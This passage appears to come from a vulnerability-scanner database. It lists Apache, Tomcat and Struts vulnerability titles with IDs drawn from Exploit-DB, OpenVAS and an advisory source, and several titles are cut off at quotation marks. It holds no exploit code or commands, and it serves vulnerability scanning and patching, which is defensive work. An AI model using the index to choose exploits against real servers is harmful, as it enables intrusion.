10803| [8308] Apache "
10804| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
10805| [8119] Apache and PHP OPTIONS request reveals "
10806| [8054] Apache is running on the system
10807| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
10808| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
10809| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
10810| [7836] Apache HTTP Server log directory denial of service
10811| [7815] Apache for Windows "
10812| [7810] Apache HTTP request could result in unexpected behavior
10813| [7599] Apache Tomcat reveals installation path
10814| [7494] Apache "
10815| [7419] Apache Web Server could allow remote attackers to overwrite .log files
10816| [7363] Apache Web Server hidden HTTP requests
10817| [7249] Apache mod_proxy denial of service
10818| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
10819| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
10820| [7059] Apache "
10821| [7057] Apache "
10822| [7056] Apache "
10823| [7055] Apache "
10824| [7054] Apache "
10825| [6997] Apache Jakarta Tomcat error message may reveal information
10826| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
10827| [6970] Apache crafted HTTP request could reveal the internal IP address
10828| [6921] Apache long slash path allows directory listing
10829| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
10830| [6527] Apache Web Server for Windows and OS2 denial of service
10831| [6316] Apache Jakarta Tomcat may reveal JSP source code
10832| [6305] Apache Jakarta Tomcat directory traversal
10833| [5926] Linux Apache symbolic link
10834| [5659] Apache Web server discloses files when used with php script
10835| [5310] Apache mod_rewrite allows attacker to view arbitrary files
10836| [5204] Apache WebDAV directory listings
10837| [5197] Apache Web server reveals CGI script source code
10838| [5160] Apache Jakarta Tomcat default installation
10839| [5099] Trustix Secure Linux installs Apache with world writable access
10840| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
10841| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
10842| [4931] Apache source.asp example file allows users to write to files
10843| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
10844| [4205] Apache Jakarta Tomcat delivers file contents
10845| [2084] Apache on Debian by default serves the /usr/doc directory
10846| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
10847| [697] Apache HTTP server beck exploit
10848| [331] Apache cookies buffer overflow
10849|
10850| Exploit-DB - https://www.exploit-db.com:
10851| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
10852| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
10853| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
10854| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
10855| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
10856| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
10857| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
10858| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
10859| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
10860| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
10861| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
10862| [29859] Apache Roller OGNL Injection
10863| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
10864| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
10865| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
10866| [29290] Apache / PHP 5.x Remote Code Execution Exploit
10867| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
10868| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
10869| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
10870| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
10871| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
10872| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
10873| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
10874| [27096] Apache Geronimo 1.0 Error Page XSS
10875| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
10876| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
10877| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
10878| [25986] Plesk Apache Zeroday Remote Exploit
10879| [25980] Apache Struts includeParams Remote Code Execution
10880| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
10881| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
10882| [24874] Apache Struts ParametersInterceptor Remote Code Execution
10883| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
10884| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
10885| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
10886| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
10887| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
10888| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
10889| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
10890| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
10891| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
10892| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
10893| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
10894| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
10895| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
10896| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
10897| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
10898| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
10899| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
10900| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
10901| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
10902| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
10903| [21719] Apache 2.0 Path Disclosure Vulnerability
10904| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
10905| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
10906| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
10907| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
10908| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
10909| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
10910| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
10911| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
10912| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
10913| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
10914| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
10915| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
10916| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
10917| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
10918| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
10919| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
10920| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
10921| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
10922| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
10923| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
10924| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
10925| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
10926| [20558] Apache 1.2 Web Server DoS Vulnerability
10927| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
10928| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
10929| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
10930| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
10931| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
10932| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
10933| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
10934| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
10935| [19231] PHP apache_request_headers Function Buffer Overflow
10936| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
10937| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
10938| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
10939| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
10940| [18442] Apache httpOnly Cookie Disclosure
10941| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
10942| [18221] Apache HTTP Server Denial of Service
10943| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
10944| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
10945| [17691] Apache Struts < 2.2.0 - Remote Command Execution
10946| [16798] Apache mod_jk 1.2.20 Buffer Overflow
10947| [16782] Apache Win32 Chunked Encoding
10948| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
10949| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
10950| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
10951| [15319] Apache 2.2 (Windows) Local Denial of Service
10952| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
10953| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
10954| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
10955| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
10956| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
10957| [12330] Apache OFBiz - Multiple XSS
10958| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
10959| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
10960| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
10961| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
10962| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
10963| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
10964| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
10965| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
10966| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
10967| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
10968| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
10969| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
10970| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
10971| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
10972| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
10973| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
10974| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
10975| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
10976| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
10977| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
10978| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
10979| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
10980| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
10981| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
10982| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
10983| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
10984| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
10985| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
10986| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
10987| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
10988| [466] htpasswd Apache 1.3.31 - Local Exploit
10989| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
10990| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
10991| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
10992| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
10993| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
10994| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
10995| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
10996| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
10997| [9] Apache HTTP Server 2.x Memory Leak Exploit
10998|
10999| OpenVAS (Nessus) - http://www.openvas.org:
11000| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
11001| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
11002| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
11003| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
11004| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
11005| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
11006| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
11007| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
11008| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
11009| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
11010| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
11011| [900571] Apache APR-Utils Version Detection
11012| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
11013| [900496] Apache Tiles Multiple XSS Vulnerability
11014| [900493] Apache Tiles Version Detection
11015| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
11016| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
11017| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
11018| [870175] RedHat Update for apache RHSA-2008:0004-01
11019| [864591] Fedora Update for apache-poi FEDORA-2012-10835
11020| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
11021| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
11022| [864250] Fedora Update for apache-poi FEDORA-2012-7683
11023| [864249] Fedora Update for apache-poi FEDORA-2012-7686
11024| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
11025| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
11026| [855821] Solaris Update for Apache 1.3 122912-19
11027| [855812] Solaris Update for Apache 1.3 122911-19
11028| [855737] Solaris Update for Apache 1.3 122911-17
11029| [855731] Solaris Update for Apache 1.3 122912-17
11030| [855695] Solaris Update for Apache 1.3 122911-16
11031| [855645] Solaris Update for Apache 1.3 122912-16
11032| [855587] Solaris Update for kernel update and Apache 108529-29
11033| [855566] Solaris Update for Apache 116973-07
11034| [855531] Solaris Update for Apache 116974-07
11035| [855524] Solaris Update for Apache 2 120544-14
11036| [855494] Solaris Update for Apache 1.3 122911-15
11037| [855478] Solaris Update for Apache Security 114145-11
11038| [855472] Solaris Update for Apache Security 113146-12
11039| [855179] Solaris Update for Apache 1.3 122912-15
11040| [855147] Solaris Update for kernel update and Apache 108528-29
11041| [855077] Solaris Update for Apache 2 120543-14
11042| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
11043| [850088] SuSE Update for apache2 SUSE-SA:2007:061
11044| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
11045| [841209] Ubuntu Update for apache2 USN-1627-1
11046| [840900] Ubuntu Update for apache2 USN-1368-1
11047| [840798] Ubuntu Update for apache2 USN-1259-1
11048| [840734] Ubuntu Update for apache2 USN-1199-1
11049| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
11050| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
11051| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
11052| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
11053| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
11054| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
11055| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
11056| [835253] HP-UX Update for Apache Web Server HPSBUX02645
11057| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
11058| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
11059| [835236] HP-UX Update for Apache with PHP HPSBUX02543
11060| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
11061| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
11062| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
11063| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
11064| [835188] HP-UX Update for Apache HPSBUX02308
11065| [835181] HP-UX Update for Apache With PHP HPSBUX02332
11066| [835180] HP-UX Update for Apache with PHP HPSBUX02342
11067| [835172] HP-UX Update for Apache HPSBUX02365
11068| [835168] HP-UX Update for Apache HPSBUX02313
11069| [835148] HP-UX Update for Apache HPSBUX01064
11070| [835139] HP-UX Update for Apache with PHP HPSBUX01090
11071| [835131] HP-UX Update for Apache HPSBUX00256
11072| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
11073| [835104] HP-UX Update for Apache HPSBUX00224
11074| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
11075| [835101] HP-UX Update for Apache HPSBUX01232
11076| [835080] HP-UX Update for Apache HPSBUX02273
11077| [835078] HP-UX Update for ApacheStrong HPSBUX00255
11078| [835044] HP-UX Update for Apache HPSBUX01019
11079| [835040] HP-UX Update for Apache PHP HPSBUX00207
11080| [835025] HP-UX Update for Apache HPSBUX00197
11081| [835023] HP-UX Update for Apache HPSBUX01022
11082| [835022] HP-UX Update for Apache HPSBUX02292
11083| [835005] HP-UX Update for Apache HPSBUX02262
11084| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
11085| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
11086| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
11087| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
11088| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
11089| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
11090| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
11091| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
11092| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
11093| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
11094| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
11095| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
11096| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
11097| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
11098| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
11099| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
11100| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
11101| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
11102| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
11103| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
11104| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
11105| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
11106| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
11107| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
11108| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
11109| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
11110| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
11111| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
11112| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
11113| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
11114| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
11115| [801942] Apache Archiva Multiple Vulnerabilities
11116| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
11117| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
11118| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
11119| [801284] Apache Derby Information Disclosure Vulnerability
11120| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
11121| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
11122| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
11123| [800680] Apache APR Version Detection
11124| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
11125| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
11126| [800677] Apache Roller Version Detection
11127| [800279] Apache mod_jk Module Version Detection
11128| [800278] Apache Struts Cross Site Scripting Vulnerability
11129| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
11130| [800276] Apache Struts Version Detection
11131| [800271] Apache Struts Directory Traversal Vulnerability
11132| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
11133| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
11134| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
11135| [103122] Apache Web Server ETag Header Information Disclosure Weakness
11136| [103074] Apache Continuum Cross Site Scripting Vulnerability
11137| [103073] Apache Continuum Detection
11138| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
11139| [101023] Apache Open For Business Weak Password security check
11140| [101020] Apache Open For Business HTML injection vulnerability
11141| [101019] Apache Open For Business service detection
11142| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
11143| [100923] Apache Archiva Detection
11144| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
11145| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
11146| [100813] Apache Axis2 Detection
11147| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
11148| [100795] Apache Derby Detection
11149| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
11150| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
11151| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
11152| [100514] Apache Multiple Security Vulnerabilities
11153| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
11154| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
11155| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
11156| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
11157| [72626] Debian Security Advisory DSA 2579-1 (apache2)
11158| [72612] FreeBSD Ports: apache22
11159| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
11160| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
11161| [71512] FreeBSD Ports: apache
11162| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
11163| [71256] Debian Security Advisory DSA 2452-1 (apache2)
11164| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
11165| [70737] FreeBSD Ports: apache
11166| [70724] Debian Security Advisory DSA 2405-1 (apache2)
11167| [70600] FreeBSD Ports: apache
11168| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
11169| [70235] Debian Security Advisory DSA 2298-2 (apache2)
11170| [70233] Debian Security Advisory DSA 2298-1 (apache2)
11171| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
11172| [69338] Debian Security Advisory DSA 2202-1 (apache2)
11173| [67868] FreeBSD Ports: apache
11174| [66816] FreeBSD Ports: apache
11175| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
11176| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
11177| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
11178| [66081] SLES11: Security update for Apache 2
11179| [66074] SLES10: Security update for Apache 2
11180| [66070] SLES9: Security update for Apache 2
11181| [65998] SLES10: Security update for apache2-mod_python
11182| [65893] SLES10: Security update for Apache 2
11183| [65888] SLES10: Security update for Apache 2
11184| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
11185| [65510] SLES9: Security update for Apache 2
11186| [65472] SLES9: Security update for Apache
11187| [65467] SLES9: Security update for Apache
11188| [65450] SLES9: Security update for apache2
11189| [65390] SLES9: Security update for Apache2
11190| [65363] SLES9: Security update for Apache2
11191| [65309] SLES9: Security update for Apache and mod_ssl
11192| [65296] SLES9: Security update for webdav apache module
11193| [65283] SLES9: Security update for Apache2
11194| [65249] SLES9: Security update for Apache 2
11195| [65230] SLES9: Security update for Apache 2
11196| [65228] SLES9: Security update for Apache 2
11197| [65212] SLES9: Security update for apache2-mod_python
11198| [65209] SLES9: Security update for apache2-worker
11199| [65207] SLES9: Security update for Apache 2
11200| [65168] SLES9: Security update for apache2-mod_python
11201| [65142] SLES9: Security update for Apache2
11202| [65136] SLES9: Security update for Apache 2
11203| [65132] SLES9: Security update for apache
11204| [65131] SLES9: Security update for Apache 2 oes/CORE
11205| [65113] SLES9: Security update for apache2
11206| [65072] SLES9: Security update for apache and mod_ssl
11207| [65017] SLES9: Security update for Apache 2
11208| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
11209| [64783] FreeBSD Ports: apache
11210| [64774] Ubuntu USN-802-2 (apache2)
11211| [64653] Ubuntu USN-813-2 (apache2)
11212| [64559] Debian Security Advisory DSA 1834-2 (apache2)
11213| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
11214| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
11215| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
11216| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
11217| [64443] Ubuntu USN-802-1 (apache2)
11218| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
| [64423] Debian Security Advisory DSA 1834-1 (apache2)
| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
| [64251] Debian Security Advisory DSA 1816-1 (apache2)
| [64201] Ubuntu USN-787-1 (apache2)
| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
| [63565] FreeBSD Ports: apache
| [63562] Ubuntu USN-731-1 (apache2)
| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
| [61185] FreeBSD Ports: apache
| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
| [60387] Slackware Advisory SSA:2008-045-02 apache
| [58826] FreeBSD Ports: apache-tomcat
| [58825] FreeBSD Ports: apache-tomcat
| [58804] FreeBSD Ports: apache
| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
| [57335] Debian Security Advisory DSA 1167-1 (apache)
| [57201] Debian Security Advisory DSA 1131-1 (apache)
| [57200] Debian Security Advisory DSA 1132-1 (apache2)
| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
| [57145] FreeBSD Ports: apache
| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
| [56067] FreeBSD Ports: apache
| [55803] Slackware Advisory SSA:2005-310-04 apache
| [55519] Debian Security Advisory DSA 839-1 (apachetop)
| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
